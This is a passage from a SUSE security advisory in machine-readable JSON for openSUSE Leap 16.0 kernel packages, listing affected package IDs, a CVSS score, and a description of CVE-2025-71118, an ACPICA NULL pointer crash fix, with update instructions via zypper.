"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-71116"
},
{
"cve": "CVE-2025-71118",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-71118"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPICA: Avoid walking the Namespace if start_node is NULL\n\nAlthough commit 0c9992315e73 (\"ACPICA: Avoid walking the ACPI Namespace\nif it is not there\") fixed the situation when both start_node and\nacpi_gbl_root_node are NULL, the Linux kernel mainline now still crashed\non Honor Magicbook 14 Pro [1].\n\nThat happens due to the access to the member of parent_node in\nacpi_ns_get_next_node(). The NULL pointer dereference will always\nhappen, no matter whether or not the start_node is equal to\nACPI_ROOT_OBJECT, so move the check of start_node being NULL\nout of the if block.\n\nUnfortunately, all the attempts to contact Honor have failed, they\nrefused to provide any technical support for Linux.\n\nThe bad DSDT table\u0027s dump could be found on GitHub [2].\n\nDMI: HONOR FMB-P/FMB-P-PCB, BIOS 1.13 05/08/2025\n\n[ rjw: Subject adjustment, changelog edits ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-71118",
"url": "https://www.suse.com/security/cve/CVE-2025-71118"
},
{
"category": "external",
"summary": "SUSE Bug 1256763 for CVE-2025-71118",
"url": "https://bugzilla.suse.com/1256763"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
